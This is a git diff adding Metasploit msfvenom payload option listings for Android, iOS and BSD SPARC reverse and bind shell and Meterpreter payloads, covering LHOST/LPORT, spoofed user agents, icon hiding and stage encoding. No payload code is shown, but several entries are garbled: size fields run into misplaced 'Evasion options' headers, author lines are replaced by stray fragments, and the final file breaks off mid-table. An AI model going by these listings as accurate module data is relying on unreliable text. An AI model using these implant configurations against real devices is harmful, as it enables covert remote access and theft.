/dev/null +++ b/msfvenom/payload_options/android-shell-reverse_https.txt @@ -0,0 +1,66 @@ + + Name: Command Shell, Android Reverse HTTPS Stager + Module: payload/android/shell/reverse_https + Platform: Android + Arch: dalvik +Needs Admin: N +Evasion options for payload/android/shell/reverse_https: +========================= + +sploit.com> + anwarelmakrahy + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Spawn a piped command shell (sh). + + Tunnel communication over HTTPS + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + HandlerSSLCert no Path to a SSL certificate in unified PEM format + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-shell-reverse_tcp.txt b/msfvenom/payload_options/android-shell-reverse_tcp.txt new file mode 100644 index 0000000..984e956 --- /dev/null +++ b/msfvenom/payload_options/android-shell-reverse_tcp.txt @@ -0,0 +1,54 @@ + + Name: Command Shell, Android Reverse TCP Stager + Module: payload/android/shell/reverse_tcp + Platform: Android + Arch: dalvik +Needs Admin: No + Total size: 10209 + Rank: Normal + +Provided by: + mihi + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Spawn a piped command shell (sh). + + Connect back stager + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_http.txt b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..0158ba1 --- /dev/null +++ b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_http.txt @@ -0,0 +1,64 @@ + + Name: Apple_iOS Meterpreter, Reverse HTTP Inline + Module: payload/apple_ios/aarch64/meterpreter_reverse_http + Platform: Apple_iOS + Arch: aarch64 +Needs Admin: No + Total size: 796904 + Rank: Normal + +Provided by: + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_https.txt b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..1c2de14 --- /dev/null +++ b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_https.txt @@ -0,0 +1,65 @@ + + Name: Apple_iOS Meterpreter, Reverse HTTPS Inline + Module: payload/apple_ios/aarch64/meterpreter_reverse_https + Platform: Apple_iOS + Arch: aarch64 +Needs Admin: No + Total size +Evasion options for payload/apple_ios/aarch64/meterpreter_reverse_https: +========================= + + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..a9df340 --- /dev/null +++ b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_tcp.txt @@ -0,0 +1,58 @@ + + Name: Apple_iOS Meterpreter, Reverse TCP Inline + Module: payload/apple_ios/aarch64/meterpreter_reverse_tcp + Platform: Apple_iOS + Arch: aarch64 +Needs Admin: No + Total size: 796904 + Rank: Normal + +Provided by: + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-aarch64-shell_reverse_tcp.txt b/msfvenom/payload_options/apple_ios-aarch64-shell_reverse_tcp.txt new file mode 100644 index 0000000..6251d70 --- /dev/null +++ b/msfvenom/payload_options/apple_ios-aarch64-shell_reverse_tcp.txt @@ -0,0 +1,38 @@ + + Name: Apple iOS aarch64 Command Shell, Reverse TCP Inline + Module: payload/apple_ios/aarch64/shell_reverse_tcp + Platform: Apple_iOS + Arch: aarch64 +Needs Admin: No + Total size: 152 + Rank: Normal + +Provided by: + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_http.txt b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..3e181fc --- /dev/null +++ b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_http.txt @@ -0,0 +1,63 @@ + + Name: Apple_iOS Meterpreter, Reverse HTTP Inline + Module: payload/apple_ios/armle/meterpreter_reverse_http + Platform: Apple_iOS + Arch: armle +Needs Admin: No + Total size +Evasion options for payload/apple_ios/armle/meterpreter_reverse_http: +========================= + +ok + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_https.txt b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..20fb9ec --- /dev/null +++ b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_https.txt @@ -0,0 +1,65 @@ + + Name: Apple_iOS Meterpreter, Reverse HTTPS Inline + Module: payload/apple_ios/armle/meterpreter_reverse_https + Platform: Apple_iOS + Arch: armle +Needs Admin: No + Total size +Evasion options for payload/apple_ios/armle/meterpreter_reverse_https: +========================= + +k + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..cbf140e --- /dev/null +++ b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_tcp.txt @@ -0,0 +1,58 @@ + + Name: Apple_iOS Meterpreter, Reverse TCP Inline + Module: payload/apple_ios/armle/meterpreter_reverse_tcp + Platform: Apple_iOS + Arch: armle +Needs Admin: No + Total size: 643824 + Rank: Normal + +Provided by: + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-sparc-shell_bind_tcp.txt b/msfvenom/payload_options/bsd-sparc-shell_bind_tcp.txt new file mode 100644 index 0000000..e21c97f --- /dev/null +++ b/msfvenom/payload_options/bsd-sparc-shell_bind_tcp.txt @@ -0,0 +1,38 @@ + + Name: BSD Command Shell, Bind TCP Inline + Module: payload/bsd/sparc/shell_bind_tcp + Platform: BSD + Arch: sparc +Needs Admin: No + Total size: 164 + Rank: Normal + +Provided by: + vlad902 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-sparc-shell_reverse_tcp.txt b/msfvenom/payload_options/bsd-sparc-shell_reverse_tcp.txt new file mode 100644 index 0000000..c6e6824 --- /dev/null +++ b/msfvenom/payload_options/bsd-sparc-shell_reverse_tcp.txt @@ -0,0 +1,45 @@ + + Name: BSD Command Shell, Reverse TCP Inline + Module: payload/bsd/sparc/shell_reverse_tcp + Platform: BSD + Arch: sparc +Needs Admin: No + Total size: 128 + Rank: Normal + +Provided by: + vlad902 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm 